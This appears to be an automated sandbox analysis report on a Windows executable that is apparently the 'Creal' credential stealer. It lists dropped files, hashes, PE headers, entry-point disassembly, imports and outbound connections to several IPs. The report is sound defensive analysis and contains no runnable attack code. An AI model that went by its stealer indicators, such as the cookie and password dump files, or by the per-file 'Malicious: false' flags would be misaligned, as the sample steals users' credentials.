Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.....2............................................................`..........................................@..L...,A..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info\INSTALLER

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info\LICENSE

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1050
Entropy (8bit):	5.072538194763298
Encrypted:	false
SSDEEP:	24:1rmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:1aJ8YHvEH5QHOs5exm3oEFJ
MD5:	7A7126E068206290F3FE9F8D6C713EA6
SHA1:	8E6689D37F82D5617B7F7F7232C94024D41066D1
SHA-256:	DB3F0246B1F9278F15845B99FEC478B8B506EB76487993722F8C6E254285FAF8
SHA-512:	C9F0870BC5D5EFF8769D9919E6D8DDE1B773543634F7D03503A9E8F191BD4ACC00A97E0399E173785D1B65318BAC79F41D3974AE6855E5C432AC5DACF8D13E8A
Malicious:	false
Preview:	Copyright Jason R. Coombs..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTW

C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info\METADATA

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	6301
Entropy (8bit):	5.107162422517841
Encrypted:	false
SSDEEP:	192:W4rkAIG0wRg8wbNDdq6T9927uoU/GBpHFwTZ:Sq0wRg8wbNDdBh927uoU/GBRFi
MD5:	9E59BD13BB75B38EB7962BF64AC30D6F
SHA1:	70F6A68B42695D1BFA55ACB63D8D3351352B2AAC
SHA-256:	80C7A3B78EA0DFF1F57855EE795E7D33842A0827AA1EF4EE17EC97172A80C892
SHA-512:	67AC61739692ECC249EBDC8F5E1089F68874DCD65365DB1C389FDD0CECE381591A30B99A2774B8CAAA00E104F3E35FF3745AFF6F5F0781289368398008537AE7
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: setuptools.Version: 65.5.0.Summary: Easily download, build, install, upgrade, and uninstall Python packages.Home-page: https://github.com/pypa/setuptools.Author: Python Packaging Authority.Author-email: distutils-sig@python.org.Project-URL: Documentation, https://setuptools.pypa.io/.Project-URL: Changelog, https://setuptools.pypa.io/en/stable/history.html.Keywords: CPAN PyPI distutils eggs package management.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: Topic :: System :: Systems Administration.Classifier: Topic :: Utilities.Requires-Python: >=3.7.License-File: LICENSE.Provides-Extra: certs.Provides-Extra: docs.Requi

C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info\RECORD

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	37694
Entropy (8bit):	5.555787611309118
Encrypted:	false
SSDEEP:	384:vSzcBlShgRUhbul9nXJkpIVh498WjXYH0+5+E/8mrnaDoaQP7IOQRJqxBPgof2yd:vc853yQXYAY8AKCT9r2/GsIVxE9Im
MD5:	087F72A04BB085627494651E36C4C513
SHA1:	1E39070E246F91D8926268A033C6F584E629E2DE
SHA-256:	BFB77A968E06417BD37023BF1A2D7F1AAE9D8E74231665D6699D5BB82BDBD7B0
SHA-512:	39CE042A20324C6B63A192D70E56B36318C45D04B810A6BD333D1D40B6DAAD947AFB9156C003BC86C700A59F0F25753416D754DA06C808814920F92582CB6058
Malicious:	false
Preview:	_distutils_hack/__init__.py,sha256=TSekhUW1fdE3rjU3b88ybSBkJxCEpIeWBob4cEuU3ko,6128.._distutils_hack/__pycache__/__init__.cpython-311.pyc,,.._distutils_hack/__pycache__/override.cpython-311.pyc,,.._distutils_hack/override.py,sha256=Eu_s-NF6VIZ4Cqd0tbbA5wtWky2IZPNd8et6GLt1mzo,44..distutils-precedence.pth,sha256=JjjOniUA5XKl4N5_rtZmHrVp0baW_LoHsN0iPaX10iQ,151..pkg_resources/__init__.py,sha256=fT5Y3P1tcSX8sJomClUU10WHeFmvqyNZM4UZHzdpAvg,108568..pkg_resources/__pycache__/__init__.cpython-311.pyc,,..pkg_resources/_vendor/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..pkg_resources/_vendor/__pycache__/__init__.cpython-311.pyc,,..pkg_resources/_vendor/__pycache__/appdirs.cpython-311.pyc,,..pkg_resources/_vendor/__pycache__/zipp.cpython-311.pyc,,..pkg_resources/_vendor/appdirs.py,sha256=MievUEuv3l_mQISH5SF0shDk_BNhHHzYiAPrT3ITN4I,24701..pkg_resources/_vendor/importlib_resources/__init__.py,sha256=evPm12kLgYqTm-pbzm60bOuumumT8IpBNWFp0uMyrzE,506..pkg_resources/_vendor/importli

C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info\WHEEL

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.820827594031884
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlViZHKRRP+tPCCfA5S:RtBMwlViojWBBf
MD5:	4D57030133E279CEB6A8236264823DFD
SHA1:	0FDC3988857C560E55D6C36DCC56EE21A51C196D
SHA-256:	1B5E87E00DC87A84269CEAD8578B9E6462928E18A95F1F3373C9EEF451A5BCC0
SHA-512:	CD98F2A416AC1B13BA82AF073D0819C0EA7C095079143CAB83037D48E9A5450D410DC5CF6B6CFF3F719544EDF1C5F0C7E32E87B746F1C04FE56FAFD614B39826
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.37.1).Root-Is-Purelib: true.Tag: py3-none-any..

C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info\entry_points.txt

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2740
Entropy (8bit):	4.540737240939103
Encrypted:	false
SSDEEP:	48:lELcZDy3g6ySDsm90rZh2Phv4hhpTqTog:yLAP8arZoP94hTTqcg
MD5:	D3262B65DB35BFFAAC248075345A266C
SHA1:	93AD6FE5A696252B9DEF334D182432CDA2237D1D
SHA-256:	DEC880BB89189B5C9B1491C9EE8A2AA57E53016EF41A2B69F5D71D1C2FBB0453
SHA-512:	1726750B22A645F5537C20ADDF23E3D3BAD851CD4BDBA0F9666F9F6B0DC848F9919D7AF8AD8847BD4F18D0F8585DDE51AFBAE6A4CAD75008C3210D17241E0291
Malicious:	false
Preview:	[distutils.commands].alias = setuptools.command.alias:alias.bdist_egg = setuptools.command.bdist_egg:bdist_egg.bdist_rpm = setuptools.command.bdist_rpm:bdist_rpm.build = setuptools.command.build:build.build_clib = setuptools.command.build_clib:build_clib.build_ext = setuptools.command.build_ext:build_ext.build_py = setuptools.command.build_py:build_py.develop = setuptools.command.develop:develop.dist_info = setuptools.command.dist_info:dist_info.easy_install = setuptools.command.easy_install:easy_install.editable_wheel = setuptools.command.editable_wheel:editable_wheel.egg_info = setuptools.command.egg_info:egg_info.install = setuptools.command.install:install.install_egg_info = setuptools.command.install_egg_info:install_egg_info.install_lib = setuptools.command.install_lib:install_lib.install_scripts = setuptools.command.install_scripts:install_scripts.rotate = setuptools.command.rotate:rotate.saveopts = setuptools.command.saveopts:saveopts.sdist = setuptools.command.sdist:sdist.seto

C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info\top_level.txt

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.9115956018096876
Encrypted:	false
SSDEEP:	3:3Wd+Nt8AfQYv:3Wd+Nttv
MD5:	789A691C859DEA4BB010D18728BAD148
SHA1:	AEF2CBCCC6A9A8F43E4E150E7FCF1D7B03F0E249
SHA-256:	77DC8BDFDBFF5BBAA62830D21FAB13E1B1348FF2ECD4CDCFD7AD4E1A076C9B88
SHA-512:	BC2F7CAAD486EB056CB9F68E6C040D448788C3210FF028397CD9AF1277D0051746CAE58EB172F9E73EA731A65B2076C6091C10BCB54D911A7B09767AA6279EF6
Malicious:	false
Preview:	_distutils_hack.pkg_resources.setuptools.

C:\Users\user\AppData\Local\Temp\_MEI60602\sqlite3.dll

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1481088
Entropy (8bit):	6.569811736013214
Encrypted:	false
SSDEEP:	24576:GjhOK/D8n/vDz5YZ/9T6F2MkEvTPdZklaOPSwfzDJ8CVjBx+Xt4V9zQXeRxd:IX/CDzGZ1T01TPPk76oDJ8qKXavzQOR
MD5:	AC633A9EB00F3B165DA1181A88BB2BDA
SHA1:	D8C058A4F873FAA6D983E9A5A73A218426EA2E16
SHA-256:	8D58DB3067899C997C2DB13BAF13CD4136F3072874B3CA1F375937E37E33D800
SHA-512:	4BF6A3AAFF66AE9BF6BC8E0DCD77B685F68532B05D8F4D18AAA7636743712BE65AB7565C9A5C513D5EB476118239FB648084E18B4EF1A123528947E68BD00A97
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.................................................................`..........................................1..L"..LS..................\....p...)..........`...T........................... ...@...............(............................text............................... ..`.rdata..............................@..@.data....G...p...>...H..............@....pdata..\...........................@..@.rsrc................X..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\unicodedata.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1138040
Entropy (8bit):	5.434701276929729
Encrypted:	false
SSDEEP:	12288:JbYefjwR6nbJonRiPDjRrO518BEPYPx++ZiLKGZ5KXyVH4eDS0E:tYeMQ0IDJc+EwPgPOG6Xyd46S0E
MD5:	BC58EB17A9C2E48E97A12174818D969D
SHA1:	11949EBC05D24AB39D86193B6B6FCFF3E4733CFD
SHA-256:	ECF7836AA0D36B5880EB6F799EC402B1F2E999F78BFFF6FB9A942D1D8D0B9BAA
SHA-512:	4AA2B2CE3EB47503B48F6A888162A527834A6C04D3B49C562983B4D5AAD9B7363D57AEF2E17FE6412B89A9A3B37FB62A4ADE4AFC90016E2759638A17B1DEAE6C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..\|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.>.......... *...................................................`.............................................X...(........`.......P.......4..x)...p......@]..T............................\..@............P..x............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....0......................@....pdata.......P......."..............@..@.rsrc........`.......(..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wpcook.txt

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.9783335811852645
Encrypted:	false
SSDEEP:	3:vgt2TO1ng2DIIbr:FO1g2D1v
MD5:	155EA3C94A04CEAB8BD7480F9205257D
SHA1:	B46BBBB64B3DF5322DD81613E7FA14426816B1C1
SHA-256:	445E2BCECAA0D8D427B87E17E7E53581D172AF1B9674CF1A33DBE1014732108B
SHA-512:	3D47449DA7C91FE279217A946D2F86E5D95D396F53B55607EC8ACA7E9AA545CFAF9CB97914B643A5D8A91944570F9237E18EECEC0F1526735BE6CEEE45ECBA05
Malicious:	false
Preview:	<--Creal STEALER BEST -->....

C:\Users\user\AppData\Local\Temp\wppassw.txt

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.9783335811852645
Encrypted:	false
SSDEEP:	3:vgt2TO1ng2DIIbr:FO1g2D1v
MD5:	155EA3C94A04CEAB8BD7480F9205257D
SHA1:	B46BBBB64B3DF5322DD81613E7FA14426816B1C1
SHA-256:	445E2BCECAA0D8D427B87E17E7E53581D172AF1B9674CF1A33DBE1014732108B
SHA-512:	3D47449DA7C91FE279217A946D2F86E5D95D396F53B55607EC8ACA7E9AA545CFAF9CB97914B643A5D8A91944570F9237E18EECEC0F1526735BE6CEEE45ECBA05
Malicious:	false
Preview:	<--Creal STEALER BEST -->....

C:\Users\user\AppData\Local\Tempwpgxhkfbhq.db

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempwpwcfcdytm.db

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4393511334109407
Encrypted:	false
SSDEEP:	24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
MD5:	8C31C5487A97BBE73711C5E20600C1F6
SHA1:	D4D6B04226D8FFC894749B3963E7DB7068D6D773
SHA-256:	A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
SHA-512:	394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.983563715699599
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	322pVOVprx.exe
File size:	13686532
MD5:	b051bbe6f5678560e4594b4c65cca682
SHA1:	3a19952dbe209eebf642fb0ad7e2e681b5fe8ea1
SHA256:	b76165845798adbba7f4070b2e4543e8fbfc9a0282273bd791f39619eee19770
SHA512:	f0e19683f7948774a2aceef72f0de8f27cb4721f9f25cd7f8ea7c988daf63f48d4ebdeb6998fe2a721f776f1decbc94313f1c03dfb411645c97c7e8674286614
SSDEEP:	393216:TEu7L/xvdqNdQJluIF3MnG3xl56BaW00TLlSpnpK2:TECLpVgdQt3MGx6P01
TLSH:	4DD6334693260CE5E7265032F476E620F632ACA54BB0D6164364F2A13E77EA0FD3EF54
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6_..W1..W1..W1../2..W1../4.)W1../5..W1..+...W1..+4..W1..+5..W1..+2..W1../0..W1..W0..W1.W+5..W1.W+3..W1.Rich.W1.........PE..d..

File Icon


Icon Hash:	d02fd8d2d6629920

Static PE Info

General

Entrypoint:	0x14000b310
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x63E99A29 [Mon Feb 13 02:02:17 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	0b5552dccd9d0a834cea55c0c8fc05be

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F08D0C092CCh
dec eax
add esp, 28h
jmp 00007F08D0C08EDFh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F08D0C09844h
test eax, eax
je 00007F08D0C09083h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F08D0C09067h
dec eax
cmp ecx, eax
je 00007F08D0C09076h
xor eax, eax
dec eax
cmpxchg dword ptr [0004121Ch], ecx
jne 00007F08D0C09050h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F08D0C09059h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
movzx eax, byte ptr [00041207h]
test ecx, ecx
mov ebx, 00000001h
cmove eax, ebx
mov byte ptr [000411F7h], al
call 00007F08D0C09643h
call 00007F08D0C0A772h
test al, al
jne 00007F08D0C09066h
xor al, al
jmp 00007F08D0C09076h
call 00007F08D0C16D51h
test al, al
jne 00007F08D0C0906Bh
xor ecx, ecx
call 00007F08D0C0A782h
jmp 00007F08D0C0904Ch
mov al, bl
dec eax
add esp, 20h
pop ebx
ret
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000411BCh], 00000000h
mov ebx, ecx
jne 00007F08D0C090C9h
cmp ecx, 01h
jnbe 00007F08D0C090CCh
call 00007F08D0C097AAh
test eax, eax
je 00007F08D0C0908Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3bd0c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x422b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x4e000	0x20c4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x95000	0x758	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x39480	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39340	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2a000	0x418	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x28800	0x28800	False	0.5583465952932098	data	6.488023200564254	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2a000	0x12b16	0x12c00	False	0.5154817708333334	data	5.824682035366569	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3d000	0x103f8	0xe00	False	0.13309151785714285	DOS executable (block device driver \377\3)	1.8096886543499544	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x4e000	0x20c4	0x2200	False	0.47794117647058826	data	5.274096406482418	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x51000	0x15c	0x200	False	0.384765625	data	2.808567494642619	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0x422b0	0x42400	False	0.020187205188679246	data	2.4244234410032606	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x95000	0x758	0x800	False	0.544921875	data	5.2576643703968475	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x520e8	0x41c28	Device independent bitmap graphic, 255 x 512 x 32, image size 261120, resolution 7501 x 7501 px/m
RT_GROUP_ICON	0x93d10	0x14	data
RT_MANIFEST	0x93d24	0x58a	XML 1.0 document, ASCII text, with CRLF line terminators

Imports

DLL	Import
USER32.dll	CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, IsValidCodePage, GetACP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetOEMCP, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetEndOfFile, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2023 04:50:15.832434893 CET	49689	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:15.832496881 CET	443	49689	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:15.832585096 CET	49689	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:15.833720922 CET	49689	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:15.833745003 CET	443	49689	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:15.859714031 CET	49690	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:15.859785080 CET	443	49690	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:15.859884024 CET	49690	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:15.892417908 CET	49690	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:15.892483950 CET	443	49690	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:16.015371084 CET	443	49690	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:16.016290903 CET	49690	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:16.016320944 CET	443	49690	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:16.018040895 CET	443	49690	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:16.018146038 CET	49690	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:16.019213915 CET	49690	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:16.019221067 CET	443	49690	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:16.019377947 CET	443	49690	51.38.43.18	192.168.2.5
Feb 14, 2023 04:50:16.019433975 CET	49690	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:16.022785902 CET	49690	443	192.168.2.5	51.38.43.18
Feb 14, 2023 04:50:16.235829115 CET	49691	443	192.168.2.5	173.231.16.76
Feb 14, 2023 04:50:16.235866070 CET	443	49691	173.231.16.76	192.168.2.5
Feb 14, 2023 04:50:16.235955954 CET	49691	443	192.168.2.5	173.231.16.76
Feb 14, 2023 04:50:16.237185955 CET	49691	443	192.168.2.5	173.231.16.76
Feb 14, 2023 04:50:16.237202883 CET	443	49691	173.231.16.76	192.168.2.5
Feb 14, 2023 04:50:16.345884085 CET	443	49689	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:16.346575022 CET	49689	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:16.346611023 CET	443	49689	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:16.348372936 CET	443	49689	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:16.348488092 CET	49689	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:16.350167990 CET	49689	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:16.350179911 CET	443	49689	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:16.350265980 CET	443	49689	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:16.350393057 CET	49689	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:16.350403070 CET	443	49689	104.237.62.211	192.168.2.5
Feb 14, 2023 04:50:16.549547911 CET	49689	443	192.168.2.5	104.237.62.211
Feb 14, 2023 04:50:16.713187933 CET	443	49691	173.231.16.76	192.168.2.5
Feb 14, 2023 04:50:16.714090109 CET	49691	443	192.168.2.5	173.231.16.76
